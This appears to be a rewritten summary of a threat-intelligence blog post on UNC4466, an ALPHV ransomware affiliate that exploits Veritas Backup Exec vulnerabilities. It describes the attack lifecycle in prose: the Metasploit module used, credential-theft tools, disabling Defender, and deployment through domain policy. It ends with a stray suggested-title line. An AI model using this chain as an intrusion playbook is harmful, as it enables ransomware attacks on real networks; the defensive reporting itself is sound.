ALPHV Ransomware Targets Vulnerable Veritas Backup Exec Installations: UNC4466 Attack Lifecycle and Detection Opportunities

ALPHV Ransomware Targets Vulnerable Veritas Backup Exec Installations: UNC4466 Attack Lifecycle and Detection Opportunities


UNC4466, a new ALPHV ransomware affiliate, has been observed by Mandiant targeting publicly exposed Veritas Backup Exec installations vulnerable to CVE-2021-27876, CVE-2021-27877, and CVE-2021-27878 for initial access to victim environments. A commercial Internet scanning service has identified over 8,500 instances of Veritas Backup Exec that are currently exposed to the internet, some of which may still be unpatched and vulnerable. In this blog post, we will explore the UNC4466 attack lifecycle, indicators, and detection opportunities.

The blog post will also discuss the emergence of ALPHV as a ransomware-as-a-service that some researchers have claimed is the successor to BLACKMATTER and DARKSIDE ransomware. Despite some ransomware operators enacting rules to avoid impacting critical infrastructure and health entities, ALPHV continues to target sensitive industries.

The timeline for the attack shows that in March 2021, Veritas published an advisory reporting three critical vulnerabilities in Veritas Backup Exec 16.x, 20.x, and 21.x. On September 23, 2022, a METASPLOIT module was released that exploits these vulnerabilities and creates a session that the threat actor can use to interact with the victim system. On October 22, 2022, Mandiant first observed exploitation of the Veritas vulnerabilities in the wild.

UNC4466's attack phases began with initial compromise and establishment of foothold in a Windows server running Veritas Backup Exec version 21.0 using the Metasploit module exploit/multi/veritas/beagent_sha_auth_rce. After that, UNC4466 used Internet Explorer to download Famatech's Advanced IP Scanner from its website, hxxps://download.advanced-ip-scanner[.]com to scan IP addresses for open ports, hostnames, operating system, and hardware manufacturer information. UNC4466 also used ADRecon to gather network, account, and host information in the victim's environment.

UNC4466 then made heavy use of the Background Intelligent Transfer Service (BITS) to download additional tools such as LAZAGNE, LIGOLO, WINSW, RCLONE, and finally, the ALPHV ransomware encryptor. The threat actor utilized multiple credential access tools, including Mimikatz, LaZagne, and Nanodump to gather clear-text credentials and credential material. UNC4466 also took steps to evade detection, including clearing event logs and disabling Microsoft Defender's real-time monitoring capability using the built-in Set-MpPreference cmdlet.

UNC4466 deployed the Rust-based ALPHV ransomware, adding immediate tasks to the default domain policy that were configured to disable security software, download the ALPHV encryptor, and execute it. As of the blog post's date, over 8,500 IP addresses advertise the "Symantec/Veritas Backup Exec ndmp" service on the default port 10000, as well as port 9000 and port 10001, demonstrating the prevalence of internet-exposed instances that could potentially be probed by attackers.

In conclusion, UNC4466's attack on Veritas Backup Exec installations exposes the importance of patching software and maintaining network security to prevent ransomware attacks. Internet-exposed instances of Veritas Backup Exec need to be monitored closely, and companies should take proactive measures to secure their networks. A title for this blog post could be "UNC4466 Ransomware Targets Vulnerable Veritas Backup Exec Installations: A Closer Look."